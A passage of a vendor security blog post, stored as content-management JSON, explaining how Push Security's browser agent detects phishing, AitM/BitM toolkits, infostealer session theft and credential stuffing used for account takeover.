"data":195630,"content":195631},{},[195632,195635,195641],{"nodeType":173,"value":75022,"marks":195633,"data":195634},[],{},{"nodeType":186,"data":195636,"content":195637},{"uri":75027},[195638],{"nodeType":173,"value":75030,"marks":195639,"data":195640},[],{},{"nodeType":173,"value":37,"marks":195642,"data":195643},[],{},{"nodeType":254,"data":195645,"content":195646},{},[195647],{"nodeType":178,"data":195648,"content":195649},{},[195650,195653,195659],{"nodeType":173,"value":75043,"marks":195651,"data":195652},[],{},{"nodeType":186,"data":195654,"content":195655},{"uri":75048},[195656],{"nodeType":173,"value":75051,"marks":195657,"data":195658},[],{},{"nodeType":173,"value":197,"marks":195660,"data":195661},[],{},{"nodeType":178,"data":195663,"content":195664},{},[195665],{"nodeType":173,"value":75061,"marks":195666,"data":195667},[],{},{"nodeType":231,"data":195669,"content":195670},{},[],{"nodeType":169,"data":195672,"content":195673},{},[195674],{"nodeType":173,"value":75071,"marks":195675,"data":195676},[],{},{"nodeType":178,"data":195678,"content":195679},{},[195680,195683,195687],{"nodeType":173,"value":75078,"marks":195681,"data":195682},[],{},{"nodeType":173,"value":75082,"marks":195684,"data":195686},[195685],{"type":370},{},{"nodeType":173,"value":75087,"marks":195688,"data":195689},[],{},{"nodeType":178,"data":195691,"content":195692},{},[195693,195696,195702],{"nodeType":173,"value":75094,"marks":195694,"data":195695},[],{},{"nodeType":186,"data":195697,"content":195698},{"uri":75099},[195699],{"nodeType":173,"value":75102,"marks":195700,"data":195701},[],{},{"nodeType":173,"value":75106,"marks":195703,"data":195704},[],{},{"nodeType":178,"data":195706,"content":195707},{},[195708],{"nodeType":173,"value":75113,"marks":195709,"data":195710},[],{},{"nodeType":312,"data":195712,"content":195715},{"target":195713},{"sys":195714},{"id":75120,"type":317,"linkType":318},[],{"nodeType":312,"data":195717,"content":195720},{"target":195718},{"sys":195719},{"id":75126,"type":317,"linkType":318},[],{"nodeType":231,"data":195722,"content":195723},{},[],{"nodeType":169,"data":195725,"content":195726},{},[195727],{"nodeType":173,"value":40632,"marks":195728,"data":195729},[],{},{"nodeType":178,"data":195731,"content":195732},{},[195733],{"nodeType":173,"value":75141,"marks":195734,"data":195735},[],{},{"items":195737},[195738,195740],{"sys":195739,"name":509},{"id":508},{"sys":195741,"name":505},{"id":504},{"items":195743},[195744],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":195745},{"url":1496},{"__typename":1528,"sys":195747,"content":195749,"title":196959,"synopsis":196960,"hashTags":118,"publishedDate":196961,"slug":196962,"tagsCollection":196963,"authorsCollection":196969},{"id":195748},"489LTCEVau7lh88tLgSPX5",{"json":195750},{"nodeType":165,"data":195751,"content":195752},{},[195753,195760,195780,195787,195793,195800,195831,195837,195843,195850,195857,195863,195870,195890,195897,195904,195910,195917,195924,195972,195990,195997,196004,196011,196016,196023,196030,196037,196044,196051,196058,196070,196076,196083,196100,196118,196125,196132,196152,196159,196176,196183,196232,196239,196258,196265,196270,196287,196305,196312,196331,196338,196344,196351,196367,196374,196381,196387,196394,196401,196408,196415,196420,196427,196434,196441,196448,196454,196461,196468,196480,196496,196503,196510,196576,196583,196590,196597,196604,196611,196618,196625,196632,196650,196657,196663,196670,196676,196683,196690,196697,196703,196710,196717,196724,196757,196764,196771,196778,196785,196792,196799,196806,196813,196861,196867,196874,196917,196923,196930,196947,196953],{"nodeType":178,"data":195754,"content":195755},{},[195756],{"nodeType":173,"value":195757,"marks":195758,"data":195759},"The last time “hacking” topped the attacker actions chart in a Verizon DBIR, Gamestop was being saved by Redditors, ChatGPT didn’t exist, and Will Smith was welcome at the Oscars. ",[],{},{"nodeType":178,"data":195761,"content":195762},{},[195763,195767,195776],{"nodeType":173,"value":195764,"marks":195765,"data":195766},"That’s right, it was back in the ",[],{},{"nodeType":186,"data":195768,"content":195770},{"uri":195769},"https://www.verizon.com/business/resources/reports/dbir/2021/masters-guide/",[195771],{"nodeType":173,"value":195772,"marks":195773,"data":195775},"2021 DBIR",[195774],{"type":194},{},{"nodeType":173,"value":195777,"marks":195778,"data":195779}," that good old-fashioned hacking was the thing hackers did the most. ",[],{},{"nodeType":178,"data":195781,"content":195782},{},[195783],{"nodeType":173,"value":195784,"marks":195785,"data":195786},"In every report since, stolen credentials have been the most common “select way-in” (weird term, I know). In this year’s DBIR, stolen credentials accounted for roughly half of the breaches recorded. ",[],{},{"nodeType":312,"data":195788,"content":195792},{"target":195789},{"sys":195790},{"id":195791,"type":317,"linkType":318},"16WQ5Siz92HZKCjDsxWBdr",[],{"nodeType":178,"data":195794,"content":195795},{},[195796],{"nodeType":173,"value":195797,"marks":195798,"data":195799},"These stats, along with others like CrowdStrike’s widely cited “80% of attacks involve identity and compromised credentials,” continue to prove that “hackers don’t hack in, they log in.” ",[],{},{"nodeType":178,"data":195801,"content":195802},{},[195803,195807,195815,195819,195827],{"nodeType":173,"value":195804,"marks":195805,"data":195806},"In the last year, more stories behind those statistics have started to emerge with a series of high profile “no-hack” identity attacks hitting the headlines – the most recent being the ",[],{},{"nodeType":186,"data":195808,"content":195810},{"uri":195809},"https://pushsecurity.com/resources/video/snowflake-the-tip-of-the-iceberg/",[195811],{"nodeType":173,"value":71275,"marks":195812,"data":195814},[195813],{"type":194},{},{"nodeType":173,"value":195816,"marks":195817,"data":195818},". You can read more about that breach and others in our repository of ",[],{},{"nodeType":186,"data":195820,"content":195821},{"uri":118063},[195822],{"nodeType":173,"value":195823,"marks":195824,"data":195826},"identity attacks in the wild",[195825],{"type":194},{},{"nodeType":173,"value":195828,"marks":195829,"data":195830}," where we take a deep dive into the techniques attackers have been using. ",[],{},{"nodeType":312,"data":195832,"content":195836},{"target":195833},{"sys":195834},{"id":195835,"type":317,"linkType":318},"6QY3hnMLMJvnk6zYHYa6pf",[],{"nodeType":312,"data":195838,"content":195842},{"target":195839},{"sys":195840},{"id":195841,"type":317,"linkType":318},"7oAUuhbwgEH5XnDZrm5Zk9",[],{"nodeType":178,"data":195844,"content":195845},{},[195846],{"nodeType":173,"value":195847,"marks":195848,"data":195849},"Why should they go to the effort of targeting hardened and well-monitored attack surfaces like networks and endpoints with 0-day exploits or EDR-evading malware, when they can instead simply take a set of stolen credentials and fire them at popular business apps to see which pop open?",[],{},{"nodeType":178,"data":195851,"content":195852},{},[195853],{"nodeType":173,"value":195854,"marks":195855,"data":195856},"Taking over an account is the equivalent of compromising an endpoint or getting a foothold on a web-facing server. From this point, an attacker can move laterally, escalate their privileges, and achieve their objective of deploying ransomware, stealing data or disrupting business-critical systems. ",[],{},{"nodeType":312,"data":195858,"content":195862},{"target":195859},{"sys":195860},{"id":195861,"type":317,"linkType":318},"3vdbE3kqFxvhE145q2CwOy",[],{"nodeType":178,"data":195864,"content":195865},{},[195866],{"nodeType":173,"value":195867,"marks":195868,"data":195869},"The data shows that account takeover, whether it’s using stolen credentials or session tokens, is now the route of least resistance for attackers, and the #1 attack vector for security teams to defend against.",[],{},{"nodeType":178,"data":195871,"content":195872},{},[195873,195877,195886],{"nodeType":173,"value":195874,"marks":195875,"data":195876},"I’m sure you already use a number of tools to secure your workforce identities – MFA, SSO, EDR, etc., and all of them have an important role to play. That said, they also have limitations that attackers are exploiting. We’ve laid out some of the ",[],{},{"nodeType":186,"data":195878,"content":195880},{"uri":195879},"https://pushsecurity.com/blog/5-reasons-why-push-security-shouldnt-exist/",[195881],{"nodeType":173,"value":195882,"marks":195883,"data":195885},"typical misconceptions that can undermine an identity security strategy",[195884],{"type":194},{},{"nodeType":173,"value":195887,"marks":195888,"data":195889}," so you can avoid the common pitfalls and achieve defense in depth.",[],{},{"nodeType":169,"data":195891,"content":195892},{},[195893],{"nodeType":173,"value":195894,"marks":195895,"data":195896},"Push vs. account takeover techniques",[],{},{"nodeType":178,"data":195898,"content":195899},{},[195900],{"nodeType":173,"value":195901,"marks":195902,"data":195903},"In this article, we’re going to show you how to use Push to bolster your identity security strategy and prevent account takeover. More specifically, we’ll cover how Push prevents, detects, and blocks some of the common attack techniques seen in this account takeover attack chain:",[],{},{"nodeType":312,"data":195905,"content":195909},{"target":195906},{"sys":195907},{"id":195908,"type":317,"linkType":318},"1FPMzCU0mBgpg1GMSz1sJH",[],{"nodeType":178,"data":195911,"content":195912},{},[195913],{"nodeType":173,"value":195914,"marks":195915,"data":195916},"Push uses browser data collected by our browser agent to either detect the attack techniques directly, or identify the vulnerabilities being exploited. Upon making a detection, the browser agent enforces a relevant security control to either block the attack or prevent the user from introducing a vulnerability.",[],{},{"nodeType":178,"data":195918,"content":195919},{},[195920],{"nodeType":173,"value":195921,"marks":195922,"data":195923},"If you’re wondering why we’ve opted to build our tool in the browser, the short answer is that being in the browser gives us:",[],{},{"nodeType":250,"data":195925,"content":195926},{},[195927,195942,195957],{"nodeType":254,"data":195928,"content":195929},{},[195930],{"nodeType":178,"data":195931,"content":195932},{},[195933,195938],{"nodeType":173,"value":195934,"marks":195935,"data":195937},"The broadest visibility",[195936],{"type":370},{},{"nodeType":173,"value":195939,"marks":195940,"data":195941}," across all workforce identities, including unmanaged identities outside your IdP.",[],{},{"nodeType":254,"data":195943,"content":195944},{},[195945],{"nodeType":178,"data":195946,"content":195947},{},[195948,195953],{"nodeType":173,"value":195949,"marks":195950,"data":195952},"The best telemetry",[195951],{"type":370},{},{"nodeType":173,"value":195954,"marks":195955,"data":195956}," for detecting identity attack TTPs and tools.",[],{},{"nodeType":254,"data":195958,"content":195959},{},[195960],{"nodeType":178,"data":195961,"content":195962},{},[195963,195968],{"nodeType":173,"value":195964,"marks":195965,"data":195967},"The perfect enforcement point",[195966],{"type":370},{},{"nodeType":173,"value":195969,"marks":195970,"data":195971}," for stopping attacker actions or risky employee actions in real time. ",[],{},{"nodeType":178,"data":195973,"content":195974},{},[195975,195979,195987],{"nodeType":173,"value":195976,"marks":195977,"data":195978},"If you want a more detailed technical explanation, you can read this article by Dan on ",[],{},{"nodeType":186,"data":195980,"content":195981},{"uri":75099},[195982],{"nodeType":173,"value":195983,"marks":195984,"data":195986},"why browser data is a better source of telemetry for detecting identity attacks than network, IdP and app logs",[195985],{"type":194},{},{"nodeType":173,"value":1477,"marks":195988,"data":195989},[],{},{"nodeType":178,"data":195991,"content":195992},{},[195993],{"nodeType":173,"value":195994,"marks":195995,"data":195996},"Now we’ve cleared that up, let's look at some account takeover techniques.",[],{},{"nodeType":169,"data":195998,"content":195999},{},[196000],{"nodeType":173,"value":196001,"marks":196002,"data":196003},"Part 1: Phishing (including AitM and BitM toolkits)",[],{},{"nodeType":178,"data":196005,"content":196006},{},[196007],{"nodeType":173,"value":196008,"marks":196009,"data":196010},"Phishing has been around since forever and there’s a mature category of solutions that are designed to detect and prevent it. But despite solutions like security awareness training, phishing domain detection services and email filtering tools, phishing is still one of the top breach vectors. ",[],{},{"nodeType":312,"data":196012,"content":196015},{"target":196013},{"sys":196014},{"id":128839,"type":317,"linkType":318},[],{"nodeType":178,"data":196017,"content":196018},{},[196019],{"nodeType":173,"value":196020,"marks":196021,"data":196022},"We’ve all been conditioned to think about phishing as something that happens over email, but it’s actually the browser where most of the action happens, regardless of the initial delivery channel. Push’s position in the browser gives you the ideal vantage point for detecting and stopping phishing attacks.",[],{},{"nodeType":178,"data":196024,"content":196025},{},[196026],{"nodeType":173,"value":196027,"marks":196028,"data":196029},"The Push browser agent performs both passive observation and active interrogation in order to detect employees having their passwords harvested or visiting cloned app login pages or pages using AitM/BitM toolkits. Phishing attacks are detected in real time so Push blocks them before your employees can enter their credentials.",[],{},{"nodeType":235,"data":196031,"content":196032},{},[196033],{"nodeType":173,"value":196034,"marks":196035,"data":196036},"Detecting phishing through user behavior",[],{},{"nodeType":178,"data":196038,"content":196039},{},[196040],{"nodeType":173,"value":196041,"marks":196042,"data":196043},"Rather than trying to detect phishing websites and domains that constantly change, Push detects and blocks phishing attempts based on observing user behavior in the browser.",[],{},{"nodeType":178,"data":196045,"content":196046},{},[196047],{"nodeType":173,"value":196048,"marks":196049,"data":196050},"Push does this by observing all logins and generating a fingerprint (or technically a k-anonymized salted partial hash) of the user’s password. This fingerprint is then stored locally to allow Push to perform comparisons.",[],{},{"nodeType":178,"data":196052,"content":196053},{},[196054],{"nodeType":173,"value":196055,"marks":196056,"data":196057},"To detect potential phishing attacks, the browser agent compares the observed password fingerprint to known fingerprints for passwords that already exist in local storage.",[],{},{"nodeType":178,"data":196059,"content":196060},{},[196061,196066],{"nodeType":173,"value":196062,"marks":196063,"data":196065},"This means that it works even if that employee was the first person to get phished using a new attacker site: ",[196064],{"type":370},{},{"nodeType":173,"value":196067,"marks":196068,"data":196069},"Push still detects it and blocks it before your employee can submit their credentials. It also works regardless of the delivery vector used to get the phishing link to the intended victim.",[],{},{"nodeType":312,"data":196071,"content":196075},{"target":196072},{"sys":196073},{"id":196074,"type":317,"linkType":318},"2V2My5IpdVUwh4QugqInUw",[],{"nodeType":178,"data":196077,"content":196078},{},[196079],{"nodeType":173,"value":196080,"marks":196081,"data":196082},"Once you’ve discovered a malicious site, you can use Push’s companion feature, URL blocking, to add the domain to a blocklist and prevent your other end-users from even visiting the site.",[],{},{"nodeType":178,"data":196084,"content":196085},{},[196086,196090,196096],{"nodeType":173,"value":196087,"marks":196088,"data":196089},"You can programmatically manage URL blocking as part of responding to an attempted phishing incident by using the ",[],{},{"nodeType":186,"data":196091,"content":196092},{"uri":183466},[196093],{"nodeType":173,"value":155030,"marks":196094,"data":196095},[],{},{"nodeType":173,"value":196097,"marks":196098,"data":196099}," to automatically add URLs to the blocklist or to sync with other threat intelligence sources of known-bad sites.",[],{},{"nodeType":178,"data":196101,"content":196102},{},[196103,196107,196115],{"nodeType":173,"value":196104,"marks":196105,"data":196106},"You can find out more about this control in this ",[],{},{"nodeType":186,"data":196108,"content":196109},{"uri":9099},[196110],{"nodeType":173,"value":196111,"marks":196112,"data":196114},"deep-dive article",[196113],{"type":194},{},{"nodeType":173,"value":197,"marks":196116,"data":196117},[],{},{"nodeType":235,"data":196119,"content":196120},{},[196121],{"nodeType":173,"value":196122,"marks":196123,"data":196124},"Detecting cloned login pages",[],{},{"nodeType":178,"data":196126,"content":196127},{},[196128],{"nodeType":173,"value":196129,"marks":196130,"data":196131},"It’s now very easy for attackers to create cloned login pages that appear to be legitimate, tricking users into providing their credentials. ",[],{},{"nodeType":178,"data":196133,"content":196134},{},[196135,196139,196148],{"nodeType":173,"value":196136,"marks":196137,"data":196138},"There’s a number of phishing kits that allow the attacker to simply copy the HTML code from a legitimate website and duplicate it on the malicious site, creating a virtually identical interface that tricks users into entering their credentials. A final sprinkle of typosquatting techniques completes the illusion of legitimacy. The Federal Communications Commission (FCC) ",[],{},{"nodeType":186,"data":196140,"content":196142},{"uri":196141},"https://www.nextgov.com/cybersecurity/2024/03/fcc-staff-targeted-phishing-attack-cloned-agency-login-site/394609/",[196143],{"nodeType":173,"value":196144,"marks":196145,"data":196147},"was a recent target",[196146],{"type":194},{},{"nodeType":173,"value":196149,"marks":196150,"data":196151}," of this kind of attack. ",[],{},{"nodeType":178,"data":196153,"content":196154},{},[196155],{"nodeType":173,"value":196156,"marks":196157,"data":196158},"Push’s cloned app detection feature detects fraudulent login pages by inspecting the resources and structure of pages users log into and fingerprinting them so they can be used to detect when that action occurs on the wrong domain. ",[],{},{"nodeType":178,"data":196160,"content":196161},{},[196162,196166,196173],{"nodeType":173,"value":196163,"marks":196164,"data":196165},"You can ",[],{},{"nodeType":186,"data":196167,"content":196168},{"uri":75027},[196169],{"nodeType":173,"value":196170,"marks":196171,"data":196172},"read more about this feature here",[],{},{"nodeType":173,"value":1477,"marks":196174,"data":196175},[],{},{"nodeType":235,"data":196177,"content":196178},{},[196179],{"nodeType":173,"value":196180,"marks":196181,"data":196182},"Detecting AitM and BitM toolkits",[],{},{"nodeType":178,"data":196184,"content":196185},{},[196186,196190,196198,196201,196209,196212,196218,196221,196229],{"nodeType":173,"value":196187,"marks":196188,"data":196189},"Adversary-in-the-Middle (AitM) phishing is a technique that uses dedicated tooling to act as a proxy between the target and a legitimate login portal for an application, principally to bypass MFA. As it’s a proxy to the real application, the page will appear exactly as the user expects, making this technique difficult to spot. Popular AitM toolkits include ",[],{},{"nodeType":186,"data":196191,"content":196193},{"uri":196192},"https://github.com/drk1wi/Modlishka",[196194],{"nodeType":173,"value":196195,"marks":196196,"data":196197},"Modlishka",[],{},{"nodeType":173,"value":2936,"marks":196199,"data":196200},[],{},{"nodeType":186,"data":196202,"content":196204},{"uri":196203},"https://github.com/muraenateam/muraena",[196205],{"nodeType":173,"value":196206,"marks":196207,"data":196208},"Muraena",[],{},{"nodeType":173,"value":2936,"marks":196210,"data":196211},[],{},{"nodeType":186,"data":196213,"content":196214},{"uri":181618},[196215],{"nodeType":173,"value":181621,"marks":196216,"data":196217},[],{},{"nodeType":173,"value":933,"marks":196219,"data":196220},[],{},{"nodeType":186,"data":196222,"content":196224},{"uri":196223},"https://www.bleepingcomputer.com/news/security/evilproxy-uses-indeedcom-open-redirect-for-microsoft-365-phishing/",[196225],{"nodeType":173,"value":196226,"marks":196227,"data":196228},"Evilproxy",[],{},{"nodeType":173,"value":197,"marks":196230,"data":196231},[],{},{"nodeType":178,"data":196233,"content":196234},{},[196235],{"nodeType":173,"value":196236,"marks":196237,"data":196238},"Browser-in-the-Middle (BitM) toolkits are different to AitM toolkits because they don’t act as a reverse proxy. Instead, they trick their victim into directly controlling the attacker’s own browser using remote desktop screen sharing and control approaches — think of this like VNC or RDP but using the browser as a client. This is the virtual equivalent of an attacker handing their laptop to their victim, asking them to log in to an app for them, and then taking their laptop back afterwards.",[],{},{"nodeType":178,"data":196240,"content":196241},{},[196242,196246,196255],{"nodeType":173,"value":196243,"marks":196244,"data":196245},"We’ve conducted a lot of research into AitM and BitM toolkits recently. If you want to learn more about how they work and see a demo of them in action, ",[],{},{"nodeType":186,"data":196247,"content":196249},{"uri":196248},"https://pushsecurity.com/resources/video/phishing-detecting-evilginx-evilnovnc-muraena-and-modlishka/",[196250],{"nodeType":173,"value":196251,"marks":196252,"data":196254},"head over here",[196253],{"type":194},{},{"nodeType":173,"value":197,"marks":196256,"data":196257},[],{},{"nodeType":178,"data":196259,"content":196260},{},[196261],{"nodeType":173,"value":196262,"marks":196263,"data":196264},"Push gives you a preconfigured set of detections for AitM and BitM toolkits, informed by our threat detection team’s research into their behavior. This phishing tool detection feature will automatically prevent users from accessing a site that’s running one of these malicious tools, and display a custom warning message to your end-users.",[],{},{"nodeType":312,"data":196266,"content":196269},{"target":196267},{"sys":196268},{"id":98287,"type":317,"linkType":318},[],{"nodeType":178,"data":196271,"content":196272},{},[196273,196277,196283],{"nodeType":173,"value":196274,"marks":196275,"data":196276},"Administrators can also consume phishing tool detection events via the ",[],{},{"nodeType":186,"data":196278,"content":196279},{"uri":183466},[196280],{"nodeType":173,"value":155030,"marks":196281,"data":196282},[],{},{"nodeType":173,"value":196284,"marks":196285,"data":196286}," into their SIEM or use Push’s webhooks to alert when a warn or block event has occurred.",[],{},{"nodeType":178,"data":196288,"content":196289},{},[196290,196294,196302],{"nodeType":173,"value":196291,"marks":196292,"data":196293},"You can read a full write-up of this feature if you want to ",[],{},{"nodeType":186,"data":196295,"content":196296},{"uri":75048},[196297],{"nodeType":173,"value":196298,"marks":196299,"data":196301},"learn more",[196300],{"type":194},{},{"nodeType":173,"value":197,"marks":196303,"data":196304},[],{},{"nodeType":169,"data":196306,"content":196307},{},[196308],{"nodeType":173,"value":196309,"marks":196310,"data":196311},"Part 2: Infostealer malware",[],{},{"nodeType":178,"data":196313,"content":196314},{},[196315,196319,196327],{"nodeType":173,"value":196316,"marks":196317,"data":196318},"The recent ",[],{},{"nodeType":186,"data":196320,"content":196321},{"uri":74621},[196322],{"nodeType":173,"value":196323,"marks":196324,"data":196326},"Snowflake breach",[196325],{"type":194},{},{"nodeType":173,"value":196328,"marks":196329,"data":196330}," highlighted how infostealer malware is becoming a serious issue for security teams. As well as being able to steal credentials for account takeover, infostealers can also be used to steal session tokens which then allow the attacker to assume an already authorized session without needing to bypass MFA.   ",[],{},{"nodeType":178,"data":196332,"content":196333},{},[196334],{"nodeType":173,"value":196335,"marks":196336,"data":196337},"Nearly half of the malware detected last year by Sophos targeted victims’ data specifically, and the majority of that malware was classified as infostealers. ",[],{},{"nodeType":312,"data":196339,"content":196343},{"target":196340},{"sys":196341},{"id":196342,"type":317,"linkType":318},"66B5MBFIhbmky7VuLGbuM3",[],{"nodeType":178,"data":196345,"content":196346},{},[196347],{"nodeType":173,"value":196348,"marks":196349,"data":196350},"Infostealers are primarily being used by Initial Access Brokers to harvest credentials and session tokens that they then sell to other threat actors intent on executing more penetrating attacks (e.g. ransomware).  ",[],{},{"nodeType":178,"data":196352,"content":196353},{},[196354,196357,196364],{"nodeType":173,"value":174980,"marks":196355,"data":196356},[],{},{"nodeType":186,"data":196358,"content":196359},{"uri":174985},[196360],{"nodeType":173,"value":174988,"marks":196361,"data":196363},[196362],{"type":194},{},{"nodeType":173,"value":1477,"marks":196365,"data":196366},[],{},{"nodeType":178,"data":196368,"content":196369},{},[196370],{"nodeType":173,"value":196371,"marks":196372,"data":196373},"Getting total coverage across your endpoint estate is notoriously difficult, if not totally unrealistic. Unless the malware is stopped on execution, then data will inevitably be stolen, and will continue to be taken until stopped (or it self-terminates). And once an attacker has stolen employee credentials or sessions, the credential stuffing and session hijacking attacks that come next won’t touch the endpoint. ",[],{},{"nodeType":178,"data":196375,"content":196376},{},[196377],{"nodeType":173,"value":196378,"marks":196379,"data":196380},"For those reasons, you can’t rely on EDR as a single line of defense against infostealers. Push gives you those extra layers of defense to stop account takeover attempts that use stolen credentials and sessions.",[],{},{"nodeType":312,"data":196382,"content":196386},{"target":196383},{"sys":196384},{"id":196385,"type":317,"linkType":318},"4YB6DLIE5TvaAsAAUoJd5v",[],{"nodeType":235,"data":196388,"content":196389},{},[196390],{"nodeType":173,"value":196391,"marks":196392,"data":196393},"Detecting stolen sessions ",[],{},{"nodeType":178,"data":196395,"content":196396},{},[196397],{"nodeType":173,"value":196398,"marks":196399,"data":196400},"Push uses its browser agent to inject a unique marker into the user agent string of sessions that occur in browsers enrolled in Push. You then add the list of domains where you wish to inject the marker into sessions, such as an identity provider like Okta or Microsoft. ",[],{},{"nodeType":178,"data":196402,"content":196403},{},[196404],{"nodeType":173,"value":196405,"marks":196406,"data":196407},"By analyzing logs from the IdP, you can identify activity from the same session that both has the Push marker and that lacks the marker. This can only ever happen when a session is extracted from a browser and maliciously imported into a different browser.",[],{},{"nodeType":178,"data":196409,"content":196410},{},[196411],{"nodeType":173,"value":196412,"marks":196413,"data":196414},"This is a high-fidelity signal that a stolen session token is being used by an attacker. It’s certainly a lot cleaner than relying on IP-based or geolocation-based signals, which result in frequent false positives.",[],{},{"nodeType":312,"data":196416,"content":196419},{"target":196417},{"sys":196418},{"id":105035,"type":317,"linkType":318},[],{"nodeType":235,"data":196421,"content":196422},{},[196423],{"nodeType":173,"value":196424,"marks":196425,"data":196426},"Detecting stolen credentials being sold on the dark web",[],{},{"nodeType":178,"data":196428,"content":196429},{},[196430],{"nodeType":173,"value":196431,"marks":196432,"data":196433},"Push integrates stolen credential threat intelligence and alerts you when your employees’ credentials are being sold on the dark web. ",[],{},{"nodeType":178,"data":196435,"content":196436},{},[196437],{"nodeType":173,"value":196438,"marks":196439,"data":196440},"Commercial TI feeds of stolen credentials have been available for some time. But what we’ve found is that the false-positive rate is incredibly high and the vast majority of credentials are no longer in use.",[],{},{"nodeType":178,"data":196442,"content":196443},{},[196444],{"nodeType":173,"value":196445,"marks":196446,"data":196447},"Push validates that leaked credentials match those that are currently being used by your employees to authenticate on any apps they are using in the browser. That means that any alerts or automated actions generated by Push are actionable true positives, cutting out a huge amount of noise and saving your security team time. ",[],{},{"nodeType":312,"data":196449,"content":196453},{"target":196450},{"sys":196451},{"id":196452,"type":317,"linkType":318},"3RnPM0ioGWi3CFMLkxQanO",[],{"nodeType":169,"data":196455,"content":196456},{},[196457],{"nodeType":173,"value":196458,"marks":196459,"data":196460},"Part 3: Credential stuffing",[],{},{"nodeType":178,"data":196462,"content":196463},{},[196464],{"nodeType":173,"value":196465,"marks":196466,"data":196467},"The previous sections looked at how Push detects and stops common techniques used for stealing and acquiring credentials. We’re now going to cover how Push stops stolen credentials from being used to access and take over employee accounts. ",[],{},{"nodeType":178,"data":196469,"content":196470},{},[196471,196476],{"nodeType":173,"value":196472,"marks":196473,"data":196475},"Credential stuffing ",[196474],{"type":370},{},{"nodeType":173,"value":196477,"marks":196478,"data":196479},"is when attackers use tools that automate the process of taking a list of stolen passwords and retargeting those credentials against different apps.",[],{},{"nodeType":178,"data":196481,"content":196482},{},[196483,196487,196492],{"nodeType":173,"value":196484,"marks":196485,"data":196486},"Closely related to credential stuffing is ",[],{},{"nodeType":173,"value":196488,"marks":196489,"data":196491},"password spraying",[196490],{"type":370},{},{"nodeType":173,"value":196493,"marks":196494,"data":196495},". Instead of using stolen credentials, an attacker uses a list of commonly used usernames and passwords to attempt to compromise accounts. ",[],{},{"nodeType":178,"data":196497,"content":196498},{},[196499],{"nodeType":173,"value":196500,"marks":196501,"data":196502},"Both credential stuffing and password spraying are high-volume, automated attacks, and they are an unrelenting problem for most businesses. Microsoft observes 4,000 of them every second and nearly half of all login requests Auth0 receive each day are attempts at credential stuffing. ",[],{},{"nodeType":178,"data":196504,"content":196505},{},[196506],{"nodeType":173,"value":196507,"marks":196508,"data":196509},"The true scale of the problem is hard to grasp, as neither app vendors nor users have effective means of monitoring for unauthorized access. Typically these breaches are only detected when:",[],{},{"nodeType":250,"data":196511,"content":196512},{},[196513,196533,196554],{"nodeType":254,"data":196514,"content":196515},{},[196516],{"nodeType":178,"data":196517,"content":196518},{},[196519,196523,196530],{"nodeType":173,"value":196520,"marks":196521,"data":196522},"The attacker leaks the data they’ve stolen, like in the ",[],{},{"nodeType":186,"data":196524,"content":196525},{"uri":74621},[196526],{"nodeType":173,"value":196323,"marks":196527,"data":196529},[196528],{"type":194},{},{"nodeType":173,"value":197,"marks":196531,"data":196532},[],{},{"nodeType":254,"data":196534,"content":196535},{},[196536],{"nodeType":178,"data":196537,"content":196538},{},[196539,196543,196551],{"nodeType":173,"value":196540,"marks":196541,"data":196542},"The attacker deploys ransomware that results in business disruption, like that suffered by ",[],{},{"nodeType":186,"data":196544,"content":196545},{"uri":88025},[196546],{"nodeType":173,"value":196547,"marks":196548,"data":196550},"MGM resorts",[196549],{"type":194},{},{"nodeType":173,"value":1477,"marks":196552,"data":196553},[],{},{"nodeType":254,"data":196555,"content":196556},{},[196557],{"nodeType":178,"data":196558,"content":196559},{},[196560,196564,196573],{"nodeType":173,"value":196561,"marks":196562,"data":196563},"The attackers use a compromised account to do something deliberately in the public eye. For example, when the SEC’s X (formerly Twitter) account was compromised and ",[],{},{"nodeType":186,"data":196565,"content":196567},{"uri":196566},"https://incyber.org/en/article/fake-sec-tweet-triggers-bitcoin-surge/#:~:text=The%20fake%20headline%20convinced%20a,an%20unauthorized%20tweet%20was%20posted.",[196568],{"nodeType":173,"value":196569,"marks":196570,"data":196572},"sent out a message announcing the approval of Bitcoin ETF",[196571],{"type":194},{},{"nodeType":173,"value":481,"marks":196574,"data":196575},[],{},{"nodeType":178,"data":196577,"content":196578},{},[196579],{"nodeType":173,"value":196580,"marks":196581,"data":196582},"Push gives you a number of controls to combat attacks using stolen and guessed passwords, both to prevent them from occurring, and detect them when they do.",[],{},{"nodeType":235,"data":196584,"content":196585},{},[196586],{"nodeType":173,"value":196587,"marks":196588,"data":196589},"Prevent employees using credentials that have already been stolen and leaked",[],{},{"nodeType":178,"data":196591,"content":196592},{},[196593],{"nodeType":173,"value":196594,"marks":196595,"data":196596},"First, let's stop your employees from using any credentials that have already been stolen and are available to attackers for use in a credential-stuffing attack. ",[],{},{"nodeType":178,"data":196598,"content":196599},{},[196600],{"nodeType":173,"value":196601,"marks":196602,"data":196603},"Push monitors stolen credential threat intelligence and compares it to the credentials employees are currently using to access their apps. ",[],{},{"nodeType":178,"data":196605,"content":196606},{},[196607],{"nodeType":173,"value":196608,"marks":196609,"data":196610},"You might be wondering, “Does that mean Push sees all our employees’ passwords!?” No. Rather, we use a fingerprint of each password and it's checked locally in the users’ browser and never leaves it. ",[],{},{"nodeType":178,"data":196612,"content":196613},{},[196614],{"nodeType":173,"value":196615,"marks":196616,"data":196617},"When we get a match – a stolen password that could successfully be used in a credential-stuffing attack – Push alerts you.",[],{},{"nodeType":235,"data":196619,"content":196620},{},[196621],{"nodeType":173,"value":196622,"marks":196623,"data":196624},"Enforce MFA on all employee accounts",[],{},{"nodeType":178,"data":196626,"content":196627},{},[196628],{"nodeType":173,"value":196629,"marks":196630,"data":196631},"Next step is to secure the accounts most vulnerable to a credential stuffing attack – those that only use a password for single-factor authentication. ",[],{},{"nodeType":178,"data":196633,"content":196634},{},[196635,196639,196647],{"nodeType":173,"value":196636,"marks":196637,"data":196638},"If you’re using SSO to access apps, then it’s easy to overlook instances where local accounts (e.g. username and password logins) are missing MFA – particularly if you’re relying on an IdP solution to audit and enforce MFA. ",[],{},{"nodeType":186,"data":196640,"content":196641},{"uri":4342},[196642],{"nodeType":173,"value":196643,"marks":196644,"data":196646},"You can read more about this problem in our blog post on ghost logins",[196645],{"type":194},{},{"nodeType":173,"value":197,"marks":196648,"data":196649},[],{},{"nodeType":178,"data":196651,"content":196652},{},[196653],{"nodeType":173,"value":196654,"marks":196655,"data":196656},"Push observes every login made by your employees (both inside and outside SSO) and inspects the authentication protocols used. Accounts that are missing MFA are identified and presented to you in the Push 